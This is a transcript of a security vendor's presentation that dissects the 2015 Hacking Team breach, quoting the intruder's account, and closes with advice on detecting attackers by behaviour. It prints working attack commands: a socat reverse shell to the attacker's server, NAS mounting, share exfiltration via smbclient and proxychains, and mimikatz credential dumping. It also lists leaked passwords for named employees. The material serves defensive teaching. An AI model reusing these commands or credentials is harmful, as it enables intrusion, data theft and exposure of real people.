Hacking the Hacking Team - SANS€¢Hacking Operations & Forensics •Reverse engineering & Malware...

36
© 2015 Cybereason Inc. All rights reserved. Hacking the Hacking Team Richard Harlan Senior Sales Engineer@ Cybereason

Transcript of Hacking the Hacking Team - SANS€¢Hacking Operations & Forensics •Reverse engineering & Malware...

© 2015 Cybereason Inc. All rights reserved.

Hacking the Hacking Team

Richard Harlan

Senior Sales Engineer@ Cybereason

© 2015 Cybereason Inc. All rights reserved.

Cybereason at a Glance

Founded by veteran cyber security experts

• Members of Elite Military Cybersecurity Unit

• Hacking Operations & Forensics

• Reverse engineering & Malware analysis

• Cryptography & Evasion

• Machine learning, big data analytics and visualization technology experts

• Artificial Intelligence: High speed intelligent event querying

• Proven : Successful deployments with the largest enterprises, 120,000 Endpoint Customer

Experienced data security scientists

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

A Model to Study

Fully Documented Adversary – Nation State Grade & Lone Operator

Learn complete TTPs

Expectations setting

Let’s make some Cyber-Defenders Cry

© 2015 Cybereason Inc. All rights reserved.

© 2015 Cybereason Inc. All rights reserved.

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Nice Guy?

Hacking Team CEO David Vincenzitti joked with company employees about

what would happen if someone leaked information:

"Imagine this: a leak on WikiLeaks showing YOU explaining the evilest

technology on earth! :-). You would be demonized by our dearest friends the

activists, and normal people would point their fingers at you."

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Hacking Team ProcessCustomer (nation state or company) would provide HT with a list of targets

and what they wish to collect

Attack would start in one of multiple ways

Method 1HT would get the person to click on a link (via spear-phishing or waterhole delivery mechanism)

Check to see if the victim was a valid target

If the victim was not a valid target:they would get a 404 error page or a news page (customer’s choice!)

If the victim was a valid target:HT Server would profile the machine (OS and browser)HT would leverage the Adobe exploit appropriate for that target and escalate privileges to NT AUTHORITY\SYSTEM Now it would install the RCS agent and load whatever modules necessary to collect the requested data

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Hacking Team ProcessMethod 2

HT would install a network injectorA tool plugged into an upstream or ISP backboneInjector identified targets based on the customer-defined rulesIt waits until victim visits a particular website (youtube.com, etc.) and redirects them to HT’s infection serverVictim receives a handy message:

HT sometimes used a binary melter in conjunction with the injectorWhen the victim downloaded a file the RCS agent would be ”melted” into the benign binary

To ensure persistence they would use UEFI BIOS rootkit to keep the RCS agent on the victim machine

Even if the user formats the hard disk, reinstalls the OS, and even buys a new hard disk the agent remains

© 2015 Cybereason Inc. All rights reserved.

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

The Hackers are Hacked

Hacking Team data exfiltration early July 2015

Twitter defaced to read “Hacked Team”

Hacking Team’s twitter account (@hackingteam) is hijacked and posts links to 400+ GB torrent file on July 5, 2015

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Inside the Torrent File

All of the Exchange server data

All of the RCS installers + manuals + source code

Important and private documents

Screenshots from employees machines

Entire GIT repository

Pirated software and pirated versions of Operating systems

3 full server images (Windows Attack server, Android attack server, and the helpdesk support server)

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Who did it?

http://pastebin.com/raw/GPSHF04A

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

His thought process

Didn’t want to use existing tools and infrastructure

”Often in the news that have attributed an attack on a group ofgovernmental hackers (the "APTs"), because they always use the sametools, leaving the same fingerprints, and even use the sameinfrastructure (domains, mail etc). They neglect because they can hackwithout legal consequences.”

“I used new servers and domains registered with new postand paid with new bitcoin address. In addition, I only used public toolsand things that I wrote especially for this attack and changed my wayto do some things to keep my normal forensic trace.”

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Recon - Tools

Very tedious but a very important stage

“the larger the attack surface, the easier it will be to find a fault…”

Google – find some surprising things

Domain enumeration – sometimes can find “hidden” subdomains

Port Scanning - “The company IDS can generate an alert to scan ports, but you do not have to worry because all internet it is constantly being scanned.”

Fingerprinting (Nmap) – discover what services are being used

Linkedin

data.com

metagoofil - Metadata on published data

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Exploitation

Spear Phishing

“I did not want to try spear phishing against Hacking Team,because your business is to help governments to spear phish their opponents.Therefore there is a much higher risk that recognize and Hacking Teaminvestigate this attempt.”

Buy Access

Thanks to painstaking Russians and their exploit kits, smugglers trafficking, and bot herders, many companies already have compromised computers within their networks.

“Almost all Fortune 500, with their huge networks have a bots already inside. However, Hacking Team is a very small company, and most employees are experts in computer security, then there was little chance that were already committed.”

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Exploitation - HT

Hacking Team has a range of public IP:inetnum: 93.62.139.32 - 93.62.139.47descr: HT public subnet

What was found: • Main website (a blog Joomla that Joomscan reveals no serious failure) • A postfix server• Pair of routers – Embedded System• Two VPN devices – Embedded System

He had three options: • find a 0day in Joomla• find a 0day in postfix, • find a 0day in one of the embedded systems

“A 0day embedded system seemed the most attainable option, and after two weeksreverse engineering work, I got a remote root exploit. Given the vulnerabilities have not yet been patched, I will not give more details.”

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Post-Exploitation / C2 / Persistence

I wrote a backdoor firmware, and compiled several toolspost-exploitation for the embedded system. The backdoor serves to protect theexploit. Use the exploit only once and then return by the backdoor…

1) busybox2) Nmap3) Responder.py - The most useful tool to attack Windows networks when you have access to the internal network but do not have a domain user.

4) Python5) tcpdump6) dsniff7) socat

For a comfortable shell with pty:my_server: socat file: `tty`, raw, echo = 0 tcp-listen: mi_puertoHacked system: socat exec: 'bash -li' pty, stderr, setsid, SIGINT, heal \

tcp: my_server: I mi_puerto

And for many other things, it is a Swiss Army knife of networking.

8) screenAs socat pty is not strictly necessary, but I wanted to feelat home in networks Hacking Team.

9) a SOCKS proxy server

To use with proxychains to access the internal network with any other program.

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Exploitation Successful!! In the network…

Nmap + Responder.py - taking a look around

Internal mapping finds NoSQL MongoDB!

Internal Hacking Team:

27017 / tcp open MongoDB MongoDB 2.6.5| mongodb-databases:| ok = 1| totalSizeMb = 47547| totalSize = 49856643072...| _ Version = 2.6.5

27017 / tcp open MongoDB MongoDB 2.6.5| mongodb-databases:| ok = 1| totalSizeMb = 31987| totalSize = 33540800512| DATABASES...| _ Version = 2.6.5

It contained audio recordings and RCS test instances

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Found the NAS w/ iSCSI

Nmap finds some iSCSI in the 192.168.1.200/24 subnet:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)...3260 / tcp open iscsi?| iscsi-info:| Target: iqn.2000-01.com.synology: ht-synology.name| Address: 192.168.200.66:3260,0| _ Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)...3260 / tcp open iscsi?| iscsi-info:| Target: iqn.2000-01.com.synology: synology-backup.name| Address: 10.0.1.72:3260,0| Address: 192.168.200.72:3260,0| _ Authentication: No authentication required

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Mount the NAS!

iSCSI requires a kernel module, and to compile it would have been difficult for theembedded system. I forwarded the port to mount from a VPS:

VPS: tgcd -L -p 3260 -q 42838Embedded system: tgcd -C -s -c 192.168.200.72:3260 VPS_IP: 42838

VPS: iscsiadm discovery -m -p -t 127.0.0.1 SendTargets

Now you find the name iqn.2000-01.com.synology iSCSI but has problemswhen mounting because he believes his address is 192.168.200.72 instead of127.0.0.1

The way I solved was:iptables -t nat -A OUTPUT -d -j 192.168.200.72 DNAT --to-destination 127.0.0.1

And now after:-m node iscsiadm --targetname = iqn.2000-01.com.synology: 192.168.200.72 -p synology-backup.name --login

... The device file appears! We ride:vmfs-fuse -o ro / dev / sdb1 / mnt / tmp

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Backups!!

We find backups of multiple virtual machines.

The Exchange Server seems most interesting. It is too large to download,but we can mount remote and look for interesting files:

$ Losetup / dev / loop0 Exchange.hackingteam.com-flat.vmdk$ Fdisk -l / dev / loop0/ Dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT

then the offset is 2048 * 512 = 10485761048576 $ losetup -o / dev / loop1 / dev / loop0$ Mount -o ro / dev / loop1 / mnt / exchange /

now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 172311 10/14/2014

We find the hard drive of the virtual machine, and assemble:

vdfuse -r -t -f VHD f0f78089-D28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk /mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1

... And finally we unpack all of the old Exchange server files in / mnt / part1

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Local Admin Password!

What interests me most about the backup is to look if you have apassword hash you can use to access the current server.

Use pwdump, cachedump, and lsadump with the registry files. lsadump gives the password for besadmin service account:

_SC_BlackBerry MDS Connection Service0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 bes3.2.6.7.8.0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........

proxychains use the SOCKS server and embedded systemsmbclient to check the password:proxychains smbclient //192.168.100.51/c$ '-U' hackingteam.local / besadmin% bes32678 !!! '

It works! Besadmin password is still valid, and is a local administrator

I use my proxy and psexec_psh metasploit for a sessionof meterpreter. Then I migrate to a 64-bit process, "load kiwi""Creds_wdigest", and I have many passwords, including the domain Administrator

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Jackpot!!!

HACKINGTEAM BESAdmin bes32678 !!!HACKINGTEAM Administrator uu8dd8ndd12!HACKINGTEAM c.pozzi P4ssword <---- sysadminM.romeo HACKINGTEAM ioLK / (90L.guerra HACKINGTEAM 4luc@=.=HACKINGTEAM D.Martinez W4tudul3spHACKINGTEAM g.russo GCBr0s0705!A.scarafile HACKINGTEAM Cd4432996111HACKINGTEAM r.viscardi Ht2015!HACKINGTEAM a.mino A! E $$ andraHACKINGTEAM m.bettini Ettore & Bella0314M.luppi HACKINGTEAM Blackou7HACKINGTEAM s.gallucci 1S9i8m4o!HACKINGTEAM d.milan set! Dob66HACKINGTEAM w.furlan Blu3.B3rry!HACKINGTEAM d.romualdi Rd13136f @ #HACKINGTEAM l.invernizzi L0r3nz0123!HACKINGTEAM e.ciceri 2O2571 & 2EHACKINGTEAM e.rabe erab @ 4HT!

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Data Exfiltration

Now I'm a domain administrator, I also began to downloadshares using my proxy and -Tc smbclient option for example:

proxychains smbclient //192.168.1.230/FAE DiskStation '\-U 'HACKINGTEAM / Administrator% uu8dd8ndd12!' -TC FAE_DiskStation.tar '*'

So I downloaded the Amministrazione, FAE DiskStation, and FileServer folders

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Lateral Movement

Running remotely requires the password/hash of local admin of the targetmimikatz & sekurlsa

For privilege escalationPowerUp, and bypassuac

Moving around Windows networkspsexec / psexec_psh invoke_psexec of powershell empire

WMI / invoke_wmi powershell empire

PSRemoting

Scheduled Tasks / schtasks

With a domain administrator account, you can download allfile names on the network with powerview:

Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ |select-string '^ (. *) \ t' | % {$ _ Matches -recurse dir [0] .Groups [1]. |select fullname | files.txt -append out-file}

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

Hunting Sysadmins

“One of my favorite pastimes is hunting the sysadmins.”

With a simple combination of Get-Keystrokes and Get-TimedScreenshot of PowerSploit, Do-Exfiltration of Nishang, and GPO, you can spy on any employee or even the entire domain

He knew the sysadmins would have access to the source code server

With the domain admin password he got easy access to the sysadmin computers and found the location and credentials for the source code

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

In Final…

“It is done. It is so easy to tear down a company and stop their human rights abuses.“

“That is the beauty and the asymmetry of hacking: with only a hundredhours of work, one person can undo years of work by amultimillion-dollar company.”

© 2015 Cybereason Inc. All rights reserved.

TTPs — Love your Enemy!!

© 2015 Cybereason Inc. All rights reserved.

MITRE ATT&CK

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

TTP vs Indicator Example Thunderstruck

• Let’s create a simple indicator for the song Thunderstruck• 1. There is a group 3 or more• 2. 1 playing lead Guitar• 3. 1 playing Bass Guitar• 4. 1 playing drums • 5. There might or might not be a lead singer• 6. There might or might not be an Australian in a school

uniform.

• Now let’s take the rule and run it against the following attack.

© 2015 Cybereason Inc. All rights reserved.

Thunderstruck – 2Cellos

© 2015 Cybereason Inc. All rights reserved.

Did the Rule work?

As you can see the indicators changed.

But the TTP (behavior) was the same. Indicators are fluid but behaviors

are hard to change.

© 2015 Cybereason Inc. All rights reserved.© 2016 Cybereason Inc. All rights reserved.

What it Means

Sec. Min. Hrs. Days Weeks Months

Damage

Time

Penetration↓

Hacking operation↓

Breach detected↓

SpreadRecon DamageC & CBreach

Increase focus on actively hunting your adversary at the endpoint

Static IOC’s important but not enough – detect attackers by their behavior

© 2015 Cybereason Inc. All rights reserved.

Cybereason Research Paper

www.cybereason.com Resources Research

© 2015 Cybereason Inc. All rights reserved.

you.Thank

www.cybereason.com